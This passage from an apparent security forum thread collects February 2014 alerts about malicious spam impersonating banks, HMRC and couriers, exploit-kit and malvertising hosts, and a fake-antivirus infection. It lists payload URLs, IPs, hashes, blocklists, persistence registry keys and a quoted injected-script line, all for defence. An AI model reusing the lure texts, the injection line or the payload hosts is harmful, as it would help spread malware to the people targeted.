Date: Wed, 5 Feb 2014 20:38:29 +0100 [14:38:29 EST]
From: GRP Lloydslink Tech [GRPLloydslinkTech@ LLOYDSBANKING .COM]
Subject: LloydsLink reference: 8255820 follow up email and actions to be taken
Lloyds TSB
Help
(New users may need to verify their email address)
If you do not see or cannot click / tap the Download attachment button:
Desktop Users:
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
Mobile Users:
Install the mobile application.
Protected by the Voltage SecureMail Cloud
SecureMail has a NEW LOOK to better support mobile devices!
Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender.
Email Security Powered by Voltage IBE™
Copyright 2002-2014 Voltage Security, Inc. All rights reserved.
Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales no. 2065. Telephone 0207626 1500
Bank of Scotland plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC327000. Telephone: 08457 21 31 41 ...

Screenshot: https://lh3.ggpht.com/-WflKBnC4NEw/UvJmkiBZelI/AAAAAAAACi8/Sy4OOq0bzG0/s1600/lloyds-tsb.png

The attachment is SecureMessage.zip which in turn contains a malicious executable SecureMessage.scr which has an icon that looks like Internet Explorer. Despire the .scr suffix, this file is a plain old .exe file and will execute if you double-click it (-don't!-). VirusTotal detections are 11/51*, and automated analysis... show an attempted download from [donotclick]asianfarm .org/images/pdf.enc and [donotclick]ideasempurna .com .my/wp-content/uploads/2014/02/pdf.enc with the following IPs being involved:
108.90.186.161 (AT&T, US)
111.90.133.246 (Piradius Net, Malaysia)
121.117.209.51 (NTT, Japan)
124.217.241.34 (Piradius Net, Malaysia)
174.103.25.199 (Time Warner Cable, US)
The .enc file is an encoded executable, explained in detail here**. I haven't tried to decode it but obviously that too will be malicious."
Recommended blocklist:
asianfarm .org
ideasempurna .com .my
108.90.186.161
111.90.133.246
121.117.209.51
124.217.241.34
174.103.25.199 "
* https://www.virustotal.com/en-gb/file/e27d1c5587206b31d7f639ef7eb890ae694e20c5bee1b3ff30a99503624c0af6/analysis/1391616188/

** http://blog.crysys.hu/2014/02/gameover-zeus-now-uses-encryption-to-bypass-perimeter-security-enc-encryption/
___

Malware uses ZWS compression for evasion tactic
- http://blog.trendmicro.com/trendlabs-security-intelligence/malware-uses-zws-compression-for-evasion-tactic/
Feb 5, 2013 - "... We have seen many instances wherein malware came equipped with improved evasion techniques, such as preventing execution of analysis tools, hiding from debuggers, blending in with normal network traffic, along with various JavaScript techniques. Security researchers have now come across malware that uses a legitimate compression technique to go unnoticed by security solutions. This malware, detected as TROJ_SHELLCOD.A, is an exploit that targets an Adobe Flash Player vulnerability (CVE-2013-5331). The malware is a document file with an embedded Flash file, which has been compressed using ZWS. Released in 2011, ZWS uses the Lempel-Ziv-Markove Algorithm (LZMA) to compress data with no data loss... Typically, malware is often downloaded and executed, which means a physical copy of the malware is dropped in the infected machine. This allows security solutions to detect the malware. However, this particular malware allots memory using VirtualAlloc and executes it, acting like a backdoor. Doing so makes it harder to trace the routines of the malware as there is no physically dropped file; instead the payload is copied directly into memory. This is the reason why this malware is able to evade most security solutions, even those that support ZWS compression. We urge users to regularly install security updates as soon as they are made available. These patches can mean the difference between protection and infection. For example, the vulnerability used in this attack was patched by Adobe in December 2013..."

:fear: :mad:

AplusWebMaster
2014-02-06, 15:16
FYI...

Fake HMRC "VAT Return" SPAM
- http://blog.dynamoo.com/2014/02/fake-hmrc-vat-return-spam.html
6 Feb 2014 - "This -fake- HMRC spam comes with a malicious attachment:
Date: Thu, 6 Feb 2014 20:32:34 +0100 [14:32:34 EST]
From: "noreply@ hmrc .gov .uk" [noreply@ hmrc .gov .uk]
Subject: Successful Receipt of Online Submission for Reference 3608005
Thank you for sending your VAT Return online. The submission for reference 3608005 was
successfully received on Thu, 6 Feb 2014 20:32:34 +0100 and is being processed. Make VAT
Returns is just one of the many online services we offer that can save you time and
paperwork.
For the latest information on your VAT Return please open attached report.
The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Cable&Wireless Worldwide in partnership with
MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was
certified virus free...

... this thing comes with a malicious payload. Attached to the message is an archive Reference.zip which in turn contains a malicious executable Reference.scr (a plain old executable, not a screensaver). This has a VirusTotal detection rate of 2/50*. Automated analysis tools... show an encrypted file** being downloaded from:
[donotclick]wahidexpress .com/scripts/ie.enc[donotclick]bsitacademy.com/img/events/ie.enc
Recommended blocklist:
182.18.188.191
wahidexpress .com
bsitacademy .com
* https://www.virustotal.com/en-gb/file/09ce8ef13352da070dfb23f10fde53fa8d5f0484b71a58a8a94b31cec017cbc9/analysis/1391686048/

** http://blog.crysys.hu/2014/02/gameover-zeus-now-uses-encryption-to-bypass-perimeter-security-enc-encryption/

Update: A -second- version of the email is circulating with the following body text:
The submission for reference 485/GB1392709 was successfully received and was not
processed.
Check attached copy for more information.
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
___

Fake "TNT UK Limited " SPAM - zero detections
- http://blog.dynamoo.com/2014/02/fake-tnt-uk-limited-spam-with-zero.html
6 Feb 2014 - This -fake- TNT spam comes with a malicious attachment that is currently not detected by any AV vendors.
Date: Thu, 6 Feb 2014 11:48:18 +0100 [05:48:18 EST]
From: TNT COURIER SERVICE [tracking@ tnt .co .uk]
Subject: TNT UK Limited - Package tracking 798950432737
Your package have been picked up and is ready for dispatch.
Connote # : 798950432737
Service Type : Export Non Documents - Intl
Shipped on : 05 Feb 14 00:00
Order No : 2819122
Status : Driver's Return Description : Wrong Address
Service Options: You are required to select a service option below.
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 798950432737
The options, together with their associated conditions...

Attached is a file Label_798950432737.zip which contains a malicious executable Label02062014.scr (an executable despite the .scr extension) with a VirusTotal detection rate of 0/41*. Despite the zero detection rate, there is plenty of badness going on... including downloads of an encrypted file from the following locations:
[donotclick]newz24x .com/wp-content/uploads/2014/02/pdf.enc
[donotclick]oilwellme .com/images/banners/pdf.enc
The Malwr report** indicates lots of IPs being communicated with, some of these look like Cloudflare addresses where newz24x .com is hosted. Take care with these if you are thinking about blocking them.
Recommended blocklist:
182.18.151.160
newz24x .com
oilwellme .com "
* https://www.virustotal.com/en-gb/file/5851cc57795437db1c8788d6c8e649ab4f5a4da96e2edad30463a2658cf64135/analysis/1391684255/

** https://malwr.com/analysis/N2UyOTljMzhlMTMwNDY2ZjkzN2Y4MWUxZGU3YTljNDk/
___

Visa/MasterCard Important Notification Spam
- http://threattrack.tumblr.com/post/75813534725/visa-mastercard-important-notification-spam
Feb 6, 2014 - "Subjects Seen:
ATTN: Important notification for a Visa / MasterCard holder!
Typical e-mail details:
Dear <email name>, Your Bank debit card has been temporarily blocked
We’ve detected unusual activity on your Bank debit card . Your debit card has been temporarily blocked, please fill document in attachment and contact us

Malicious File Name and MD5:
<email name>_Account_Report_7552804B13.zip (F08171CEF69EFD04CFC0F525ABD862FD)
PDF_Account_Details_User_543857394652798346597456987235986498756234798573280945-4353452345-32453245324532-45.pdf.exe (A1E61D4628E8381F47CE2E8424410A39

Screenshot: https://31.media.tumblr.com/0eb34e8b214e15559e9de99e1968a9c8/tumblr_inline_n0l7oel4t81r6pupn.png

Tagged: Visa, MasterCard, Tepfer
___

Swedish newssite compromised - Fake AV
- http://bartblaze.blogspot.com/2014/02/swedish-newssite-compromised.html
Feb 6, 2014 - "... a Swedish and well-visited newssite, AftonBladet (http ://www .aftonbladet .se), was -compromised- and serving visitors a fake antivirus or rogueware. There are two possibilities as to the cause:
- A (rotating) ad where malicious Javascript was injected
- AftonBladet itself had malicious Javascript injected
Whoever the cause, the injected script may have been as simple as:
document.write('< script src=http ://http ://www .aftonbladet .se/article/mal.php'); When trying to reproduce, it appeared it already was cleaned up, fast actions there...
File: svc-ddrs.exe
Image icon: https://lh3.ggpht.com/-edoZpNtfHHg/UvOQUTMDFkI/AAAAAAAAA3U/yuEdOGlC6Ok/s1600/1.png
Size: 1084416 bytes
Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5: be886eb66cc39b0bbf3b237b476633a5
SHA1: 36c3671f37f414ad6e0954e094a1a7bd0dcc34fc
ssdeep: 24576:M2xJbbGmTvmN9BfQ0lc4Bt4Xsk2QkibF5BOWe8JH0:M6bb3MQ0lc434n2Qhh5kWe8JU
Date: 0x52F1C3E1 [Wed Feb 5 04:53:53 2014 UTC]
EP: 0x5a8090 UPX1 1/3 [SUSPICIOUS]
CRC: Claimed: 0x0, Actual: 0x10eeb0 [SUSPICIOUS]
Packers: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
VirusTotal: https://www.virustotal.com/en-gb/file/ee2107d3d4fd2cb3977376b38c15baa199f04f258263ca7e98cb28afc00d2dd0/analysis/
Anubis: http://anubis.iseclab.org/?action=result&task_id=12dc4daced1762174cdfa58df0872aae2&format=html
When executing the sample: Windows Efficiency Master:
> https://lh3.ggpht.com/-Gvb7kJhW-4Y/UvORtOSDp-I/AAAAAAAAA3k/9wPHFmiTPFw/s1600/fakeav2.PNG
Fake scanning results:
> https://lh3.ggpht.com/-N53YX8RSsCg/UvORsyLe8oI/AAAAAAAAA3g/EP6pDyeb9F8/s1600/FakeAV.PNG
Besides dropping the usual EXE file in the %appdata% folder, it also drops a data.sec file with predefined scanning results (all fake obviously). Here's a pastebin with the contents of data.sec: http://pastebin.com/DCtDWEbi
It also performs the usual actions:
- Usual blocking of EXE and other files
- Usual blocking of browser like Internet Explorer
- Callback to 93.115.86.197 C&C
- Stops several antivirus services and prevents them from running
- Reboots initially to stop certain logging and monitoring tools
- Uses mshta.exe (which executes HTML application files) for the usual payment screen
- Packed with UPX, so fairly easy to unpack
- Connects to http ://checkip .dyndns .org/ to determine -your- IP
This rogueware or fake AV belongs to the Tritax family, which has been going around for quite some time and has lots and lots of different names, but the design, concept and initial social engineering attack are all the same... an excellent post on this family, which you can read here:
> http://blog.0x3a.com/post/75474731248/analysis-of-the-tritax-fakeav-family-their-active
Prevention: In this case, no exploit -nor Java/Adobe, nor browser- was used. Only Javascript was injected. Install an antivirus and antimalware product and keep it up-to-date & running. Use NoScript in Firefox or NotScripts in Chrome. -Block- the above IP...
Disinfection: Perform a full scan with your installed antivirus and a scan with another antivirus or antimalware product. You can check on VirusTotal which antivirus applications already detect this malware. If you are having issues doing this, reboot your machine in Safe Mode and remove the malware..."
___

Payroll Report Spam
- http://threattrack.tumblr.com/post/75690172079/payroll-report-spam
Feb 5, 2014 - "Subjects Seen:
Jan Report
Typical e-mail details:
Hello ,
Please find attached reports for this year for checking.
Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission.
Kind regards
Wilton
Payroll Manager

Malicious File Name and MD5:
January.zip (F261B2109FD733559191CCCB7DEC79F8)
January.scr (811AD8F76AD489BAF15DB72306BD9F34)

Screenshot: https://31.media.tumblr.com/97e3ccd0fe0239fd42eb28d8c7e5c4c7/tumblr_inline_n0j10oxUm21r6pupn.png

Tagged: Payroll, Upatre
___

Fake "Payment Fund" SPAM - Wire.Transfer.rar attachment
- http://blog.dynamoo.com/2014/02/payment-fund-spam-with-wiretransferrar.html
5 Feb 2014 - "It's rare to see malware with a .RAR attachment, but this is one of those unusual beasts..
From: Alison George allison.george@ transferduc .nl
Date: 5 February 2014 22:41
Subject: Payment Fund
ALERT! A bank Wire transaction, Has just been rejected from checking 656778*** account.
to your bank confirmed by the FedWire.
Transaction ID: 99076900
Date: 2/3/2014
Transfer Origination: Fedline
Please review the attached copy of transaction report,
Federal Reserve Financial Services
Creating Nationwide Solutions for Your Payment Needs
20th Street and Constitution Avenue N.W.
Washington, D.C. 20551

Attached is a file Wire.Transfer.rar which you will need to unpack with a suitable application. In turn this creates a file Wire-Report which is actually an executable, but missing the .exe extension.. so you have to add that to get infected. Hmmm.. the phrase "some assembly required" springs to mind. The VirusTotal detection rate is 7/50* but most automated analysis tools seem to be having problems with the executable, so perhaps it is hardened against analysis or is simply corrupt. The ThreatExpert report (for some reason -not- showing in their database right now) has the following details:
Submission Summary:
Submission details:
Submission received: 5 February 2014, 04:39:38 PM
Processing time: 6 min 0 sec
Submitted sample:
File MD5: 0x12F1265162AAD712C271DAC6A9B5E564
Filesize: 248,320 bytes
Summary of the findings:
What's been found Severity Level
Creates a startup registry entry.
Technical Details:
Memory Modifications
There was a new process created in the system:
Process Name Process Filename Main Module Size
server.exe %Temp%\server.exe 57,344 bytes
Registry Modifications
The newly created Registry Values are:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
babe8364d0b44de2ea6e4bcccd70281e = ""%Temp%\server.exe" .."
so that %Temp%\server.exe runs every time Windows starts
[HKEY_CURRENT_USER\Environment]
SEE_MASK_NOZONECHECKS = "1"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
5PmM1jWi05 = "%AppData%\y183imD2\java.exe.lnk"
babe8364d0b44de2ea6e4bcccd70281e = ""%Temp%\server.exe" .."
so that %Temp%\server.exe runs every time Windows starts
Other details
To mark the presence in the system, the following Mutex object was created:
babe8364d0b44de2ea6e4bcccd70281e "
* https://www.virustotal.com/en-gb/file/61a58853545ccb8b8b01f6a2a37a9cc332b5a5de57c6be03a4ee40fd0ab92d48/analysis/1391640427/

:fear: :mad:

AplusWebMaster
2014-02-07, 14:26
FYI...

Something evil on 69.64.39.166
- http://blog.dynamoo.com/2014/02/something-evil-on-696439166.html
7 Feb 2014 - "69.64.39.166 (Hosting Solutions International, US) appears to be hosting an exploit kit (possibly Fiesta*) according to URLquery reports such as this one**. The code is being -injected- into target websites, possibly through a malvertising campaign. I would recommend blocking the IP address as the simplest option, although I can identify the following domains on that same IP, all of which are likely to be malicious..."
(Long list of URLs at the dynamoo URL above.)
* http://blog.0x3a.com/post/62375513265/fiesta-exploit-kit-analysis-serving-msie-exploit

** http://urlquery.net/report.php?id=9258190

- https://www.virustotal.com/en/ip-address/69.64.39.166/information/
___

Fake rbs .co .uk "Important Docs" SPAM
- http://blog.dynamoo.com/2014/02/rbscouk-important-docs-spam.html
7 Feb 2014 - "This -fake- spam claiming to be from the Royal Bank of Scotland has a malicious attachment:
Date: Fri, 7 Feb 2014 15:44:19 +0530 [05:14:19 EST]
From: Doris Clay [Doris@ rbs .co .uk]
Subject: Important Docs
Account report.
Tel: 01322 589422
Fax: 01322 296116
email: Doris@rbs .co .uk
This information is classified as Confidential unless otherwise stated.
CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are
confidential and are intended solely for the use of the person or entity to whom the
message was addressed. If you are not the intended recipient of this message, please be
advised that any dissemination, distribution, or use of the contents of this message is
strictly prohibited. If you received this message in error, please notify the sender.
Please also permanently delete all copies of the original message and any attached
documentation. Thank you.

Attached is a file AccountReport.zip which in turn contains a malicious executable AccountReport.scr which has a VirusTotal detection rate of 4/50*. Automated analysis tools... show a downlad of en encrypted file from the following locations:
[donotclick]professionalonlineediting .com/theme/cc/images/07UKex.enc
[donotclick]mararu .ro/Media/07UKex.enc
Both those sites are hosted by Mochanin Corp in the US, indicating perhaps a wider problem with that host.
Recommended blocklist:
204.93.165.33
50.31.147.54
professionalonlineediting .com
mararu .ro "
* https://www.virustotal.com/en-gb/file/3bad82849b284c4db1834aca6674faec5577e2b5858510b8b74880b7d214fd08/analysis/1391768230/

- http://threattrack.tumblr.com/post/75930437470/rbs-bank-spam
Feb 7, 2014 - "Subjects Seen:
Important Docs
Typical e-mail details:
Account report.
Tel: 01322 052736
Fax: 01322 513203
email: Trenton@ rbs .co .uk
This information is classified as Confidential unless otherwise stated.

Malicious File Name and MD5:
AccountReport.zip (0D143292B014E22DEE91930C488CBCE0)
AccountReport.scr (61DF278485C8012E5B2D86F825E12D0D)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d7bdb172dfd9862adf3132aeba2be8d4/tumblr_inline_n0nbbdYk421r6pupn.png

Tagged: RBS, Upatre
___

Fake Authorization SPAM
- http://blog.dynamoo.com/2014/02/authorization-to-use-privately-owned.html
7 Feb 2014 - "We've seen this particular type of malware-laden spam before..
Date: Fri, 7 Feb 2014 17:08:16 +0700 [05:08:16 EST]
From: Callie Figueroa [Callie@ victimdomain]
Subject: Annual Form - Authorization to Use Privately Owned Vehicle on State Business
All employees need to have on file this form STD 261 (attached). The original is
retained by supervisor and copy goes to Accounting. Accounting need this form to approve mileage reimbursement.
The form can be used for multiple years, however it needs to re-signed annually by
employee and supervisor.
Please confirm all employees that may travel using their private car on state business
(including training) has a current STD 261 on file. Not having a current copy of this
form on file in Accounting may delay a travel reimbursement claim.

The email appears to originate from within the victim's own domain but doesn't. Attached is an archive file Form_STD261.zip which in turn contains a malicious executable Form_STD261.scr which has a VirusTotal detection rate of just 3/51*. Anubis reports** an attempted connection to faneema .com on 198.38.82.223 (Mochahost, US). I recommend blocking both the domain and IP address in this case.
* https://www.virustotal.com/en-gb/file/0516c5b7168d16d6c2f82ae6bf57d1acbafe4b2fa30a33055f7a848bf3ac5b8f/analysis/1391770188/

** http://anubis.iseclab.org/?action=result&task_id=18be1565e6a6c96a4e155daf0c9fe792b&format=html

:mad: :fear:

AplusWebMaster
2014-02-10, 14:56
FYI...

Evil .pw domains on 31.41.221.131 to 31.41.221.135
- http://blog.dynamoo.com/2014/02/something-evil-on-3141221131-to.html
10 Feb 2014 - "Thanks to Malekal for the heads up*, the current batch of evil .pw domains that have been distributing malware appear to have shifted to the following IP addresses:
31.41.221.131
31.41.221.132
31.41.221.133
31.41.221.134
31.41.221.135
These IP addresses belong to Besthosting in Ukraine. A typical payload of one of these malicious sites looks like this URLquery report**.
The evil .pw domains in use all use a subdomain of one of the following:
(Long list at the dynamoo URL above)
I would recommend blocking those domains and the above-listed IPs (or alternatively 31.41.221.128/29 or 31.41.221.128/25). A full list of all the subdomains I can find is here [pastebin]***"
* https://twitter.com/malekal_morte/status/432804655374938112

** http://urlquery.net/report.php?id=9308286

*** http://pastebin.com/xSHmpKQR
___

81.4.106.132 / oochooch .com / 10qnbkh .xip .io
- http://blog.dynamoo.com/2014/02/814106132-oochoochcom-10qnbkhxipio.html
10 Feb 2014 - "... don't like the look of this , seems to be the payload site for some sort of injection attack. Might be worth blocklisting 81.4.106.132 **...
> [url]https://lh3.ggpht.com/-_KGxwVddVxI/UvjaWxkUaUI/AAAAAAAACkM/PdORyIs_M00/s1600/oochooch.png "

* http://urlquery.net/search.php?q=81.4.106.132&type=string&start=2014-01-26&end=2014-02-10&max=50

** https://www.virustotal.com/en/ip-address/81.4.106.132/information/
___

Malicious Android apps hit 10 million ...
- http://www.theinquirer.net/inquirer/news/2327881/malicious-android-apps-hit-the-10-million-mark
Feb 10, 2014 - "THE ANDROID OPERATING SYSTEM (OS) has over 10 million malicious apps, security firm Kaspersky has warned in its latest report. In the Kaspersky Security Bulletin 2013, researchers said that by late January 2014 they had found 200,000 unique samples of mobile malware at the Google Play store and other sources, which get re-used and re-packaged to look like different apps... (cybercriminals used 10,604,273 unique hosts)... Kaspersky said in its report*... in most cases, malware targets the user's financial information**..."
* https://www.securelist.com/en/analysis/204792318/Kaspersky_Security_Bulletin_2013_Overall_statistics_for_2013#09

** https://www.securelist.com/en/analysis/204792318/Kaspersky_Security_Bulletin_2013_Overall_statistics_for_2013#02

Corporate Threats: Target organizations
- https://www.securelist.com/en/analysis/204792317/Kaspersky_Security_Bulletin_2013_Corporate_threats#01

:fear: :mad:

AplusWebMaster
2014-02-11, 18:42
FYI...

TrendMicro 2013 report
- http://blog.trendmicro.com/trendlabs-security-intelligence/2013-security-roundup/
Feb 11, 2014 - "... We saw almost a -million- new banking malware variants, which was double what we saw in 2012. Much of this growth occurred in the latter half of the year:
Volume of new banking malware
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/02/2013roundup1.jpg
Two countries – the United States and Brazil – accounted for half of all banking malware victims:
Countries most affected by banking malware
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/02/2013roundup2.jpg
... CryptoLocker became as serious a problem for end users as fake antivirus malware had in previous years. The fall of the Blackhole Exploit Kit in 2013 due to the arrest of its creator... was a significant event that appreciably changed the threat landscape. It significantly cut the use of malicious links in spam messages by attackers... other exploit kits have emerged into the threat landscape since then...
Types of mobile malware threats
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/02/2013roundup4.jpg
... Attacks delivered via social media (combined with social engineering) have now become the norm, with newer social networks like Instagram, Pinterest, and Tumblr suffering from their own scams as well. Indeed, attacks on -all- social media platforms have become so common, it may almost be considered “business as usual”..."
___

NatWest Bank Credit Card Spam
- http://threattrack.tumblr.com/post/76324769715/natwest-bank-credit-card-spam
Feb 11, 2014 - "Subjects Seen:
Cards OnLine E-Statement E-Mail Notification
Typical e-mail details:
Dear Customer
Your February 11, 2014 E-Statement for account number xxxxxxxxxxxx9496 from Cards OnLine is now available.
For more information please check attached copy
Thank you
Cards OnLine

Malicious File Name and MD5:
E-Statement.zip (3B17E8E5BADF9ADB41974C2DDED1464E)
E-Statement.exe (20E7520948EE772E192127374569B219)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/91191174301594fc4b010f35720bd387/tumblr_inline_n0u51lCyrt1r6pupn.png

Tagged: NatWest, Upatre
___

'Incoming Fax Report' - Malware Email
- http://www.hoax-slayer.com/incoming-fax-report-malware-email.shtml
Feb 11, 2014 - "Email purporting to be a notification about an incoming payroll related fax claims that users can click a link to read the file online... The link in the email opens a compromised website that harbours malware. If downloaded and installed, this malware may steal information from the infected computer, make connections with remote servers operated by criminals and download further malware components. If you receive one of these fake fax emails do not click any links or open any attachments that it contains.
Example:
*********************************************************
INCOMING FAX REPORT
*********************************************************
Date/Time: 10/02/2014 05:13:13 EST
Speed: 25903 bps
Connection time: 04:08
Pages: 7
Resolution: Normal
Remote ID: 8102702342
Line number: 4
DTMF/DID:
Description: Payroll
Click here to view the file online
*********************************************************

... Those who go ahead and click the link in the hope of viewing the supposed fax file will be taken to a website that displays a 'please wait' message. The compromised site may attempt to load malicious scripts, which then redirect to a malware page. The exact configuration and payload of the malware sites may vary. Typically, however, malware downloaded from such sites may perform one or more nefarious tasks. It may harvest information from the infected computer and send it to cybercriminals. It may allow criminals to control the computer remotely and join it to a botnet. It may download and install even more malware that can perform various other functions... The criminals bank on the fact that at least a few customers of such services may click on the link without due caution. And, even people that have never used such a service may be panicked into clicking the link in the mistaken belief that their bank account has been compromised or payments have been made in their names..."

:fear: :mad:

AplusWebMaster
2014-02-12, 22:03
FYI...

Fake FedEx SPAM
- http://blog.dynamoo.com/2014/02/track-shipmentsfedex-spam.html
12 Feb 2014 - "This -fake- FedEx spam leads to malware:
Date: Wed, 12 Feb 2014 07:53:36 -0700 [09:53:36 EST]
From: FedEx [yama@ rickyz .jp]
Subject: Track shipments/FedEx 7487214609167750150131 results: Delivered
Track shipments/FedEx Office orders summary results:
Tracking number Status Date/Time
7487214609167750150131 Delivered Feb 11, 2014 11:20 AM
Track shipments/FedEx Office orders detailed results:
Tracking number 7487214609167750150131
Reference 304562545939440100902500000000
Ship date Feb 03, 2014
Ship From NEW YORK, NY
Delivery date Feb 11, 2014 11:20 AM
Service type FedEx SmartPost
Tracking results as of Feb 11, 2014 3:37 PM CST
Click Here and get Travel History ...

Screenshot: https://lh3.ggpht.com/-HHSPTBU0P1s/UvuVWCBMZuI/AAAAAAAACkc/-NKj72yFA8I/s1600/fedex2.png

In this case, the link in the email goes to [donotclick]pceninternet .net/tracking.php?id_7487214609167750150131 which downloads an archive file track_shipments_FedEx.zip. In turn, this ZIP file contains the malicious executable with the lovely name of Track_shipments_FedEx_Office_orders_summary_results_Delivered_tracking_number_9384758293431234834312_idju2f83f9hjv78fh7899382r7f9sdh8wf.doc.exe which has an icon that makes it look like a Word document. This has a VirusTotal detection rate of 15/49*, but automated analysis tools are inconclusive as to its payload..."
* https://www.virustotal.com/en-gb/file/fc959980ff4d8ad76ebf02adfab6a9ebd4bc04df213faaaa7405a579dcbcb785/analysis/1392219267/
___

Malware (Neutrino EK?) sites to block
- http://blog.dynamoo.com/2014/02/malware-neutrino-ek-sites-to-block-12214.html
12 Feb 2014 - "The following IPs and domains appear to be in use for spreading exploit kits via injection attacks - 108.178.7.118 (Singlehop, US) [1] [2] and 212.83.164.87 (Online SAS, France) [3] [4]. The payload isn't clear, but some of the URLquery reports indicate Neutrino*. In the case I saw, the victim was directed to the EK from a compromised site at greetingstext .com. I cannot reproduce the problem with URLquery or any other tool, but log files do not lie. I would recommend that you block these following IPs and domains as a precaution:
108.178.7.118
212.83.164.87
jakiewebs .com
sheethoo .com
chaefooh .com
goldnclouds .com
nofledno .com
zeuriele .com
wqywdo .xip .io
glindeb.com "
1) https://www.virustotal.com/en-gb/ip-address/108.178.7.118/information/

2) http://urlquery.net/search.php?q=108.178.7.118&type=string&start=2014-01-28&end=2014-02-12&max=50

3) https://www.virustotal.com/en-gb/ip-address/212.83.164.87/information/

4) http://urlquery.net/search.php?q=212.83.164.87&type=string&start=2014-01-28&end=2014-02-12&max=50

* http://urlquery.net/report.php?id=9410080
___

In the wild: Phony SSL certificates impersonating Google, Facebook, and iTunes
- http://arstechnica.com/security/2014/02/in-the-wild-phony-ssl-certificates-impersonating-google-facebook-and-itunes/
Feb 12, 2014 - "Researchers have found dozens of fake certificates impersonating the secure sections of online banks, e-commerce sites, and social networks. Google, Facebook, iTunes, and even a POP e-mail server belonging to GoDaddy are a small sample of the services affected by the fraudulent credentials, which in some cases can allow attackers to read and modify encrypted traffic passing between end users and protected servers.
> http://cdn.arstechnica.net/wp-content/uploads/2014/02/facebook1.png
The secure sockets layer (SSL) certificates don't pose much of a threat to people using a popular Web browser to visit spoofed websites, because the credentials aren't digitally signed by a trusted certificate authority, researchers from Netcraft wrote in a blog post published Wednesday*. They went on to say that people accessing sensitive websites with smartphone apps or other non-browser software may -not- be so lucky... Many of the fake SSL certificates discovered by Netcraft were created with malicious intentions. A wildcard certificate for *.google.com suggests an attempt to spoof a variety of Google services. The fake certificate was served by a machine in Romania hosting other sites with .ro and .com domains. The phony credential claims to have been issued by America Online Root Certification Authority 42. The name closely mimics a legitimate trusted root certificate that is installed in all browsers, although it's not enough to trick them. Other fraudulent credentials masqueraded as certificates for Facebook, iTunes, and a payment service and bank located in Russia. Yet another bogus certificate covered pop.where.secureserver.net, a server address belonging to GoDaddy's POP e-mail service... given the large number of e-mail clients, smartphone apps, and other non-browser programs available, it's not a stretch to think the certificates discovered by Netcraft are fooling some people right now. You should carefully consider the source of any app that connects to an SSL-protected server before installing it, and you should -never- click through pop-up windows that warn of self-signed certificates."
* http://news.netcraft.com/archives/2014/02/12/fake-ssl-certificates-deployed-across-the-internet.html

- http://www.theregister.co.uk/2014/02/14/fake_ssl_cert_peril/
14 Feb 2014

:mad: :fear:

AplusWebMaster
2014-02-13, 13:19
FYI...

Fake MS 'Reactivate Your Email Account' Phish
- http://www.hoax-slayer.com/microsoft-reactivate-email-account-phishing-scam.shtml
Feb 13, 2014 - "Email purporting to be from Microsoft claims that recipients must click a link to complete a 'one time automatic verification' in order to avoid having their email account suspended. The email is not from Microsoft. It is a crude phishing scam designed to trick recipients into giving their email address and password to online criminals. The criminals will use the stolen data to hijack the compromised email accounts and use them to send further spam and scam messages in the names of their victims. Example:
Subject: REACTIVATE YOUR EMAIL ACCOUNT!!!
Attention;
In compliance with the email upgrade instructions from
Microsoft Corporation and WWW email domain host, all unverified email accounts would be suspended for verification.
To avoid suspension of your email account and also to retain all email Contents, please perform one time automatic verification by completing the online verification form.
Please CLICK HERE
for the online verification form.
As a confirmation of complete and successful verification, you shall be automatically be redirected to your email web page.
Please move this message to your inbox, if found in bulk folder. Please do this for all your email accounts.
Thank you.
WWW. mail Support Team.
© 2014 Microsoft Corporation.

Screenshot: http://www.hoax-slayer.com/images/microsoft-reactivate-email-scam-2014-1.jpg

According to this email, which purports to be from Microsoft, the recipient must complete a verification of his or her email account by clicking a link in the message. The message warns that all unverified email accounts will face suspension and the loss of all 'email contents' in the accounts... the email is -not- from Microsoft. It is a phishing scam designed to trick recipients into giving their email address and password to Internet criminals. Clicking the link in the fake email takes users to an equally fake site that asks for their email address, email password and date of birth. After supplying this information, users are automatically redirected away from the scam website. Meanwhile, the scammers can use the data that they have stolen to access the compromised email accounts and use them to launch further spam and scam campaigns. Since the scam emails are sent via the hijacked accounts of victims, the emails cannot be traced back to the criminals responsible... No legitimate email provider is likely to send an unsolicited email asking customers to provide their email password by clicking a link, opening an attachment or replying. Be very wary of any email that makes such a request."

:fear::fear: :mad:

AplusWebMaster
2014-02-14, 19:14
FYI...

DoubleClick malvertising campaign exposes... malvertising infrastructure
- http://www.webroot.com/blog/2014/02/14/doubleclick-malvertising-campaign-exposes-long-run-beneath-radar-malvertising-infrastructure/
Feb 14, 2014 - "... we became aware of a possible evasive/beneath the radar malvertising based g01pack exploit kit attack, taking place through the DoubleClick ad network using an advertisement featured at About .com. Investigating further, we were able to identify the actual domains/IPs involved in the campaign, and perhaps most interestingly, managed to establish a rather interesting connection between the name servers of one of the domains involved in the attacks, and what appears to be a fully operational and running Ukrainian-based ad platform, Epom in this particular case...
Malvertising domains/URLs/IPs involved in the campaign:
adservinghost1 .com – 212.124.112.232; 212.124.112.226 (known to have responded to the same IP is also cpmservice1 .com); 212.124.112.229; 74.50.103.41; 68.233.228.236
ad.onlineadserv .com – 37.59.15.44; 37.59.15.211, hxxp ://188.138.90.222 /ad.php?id=31984&cuid=55093&vf=240
IP reconnaissance:
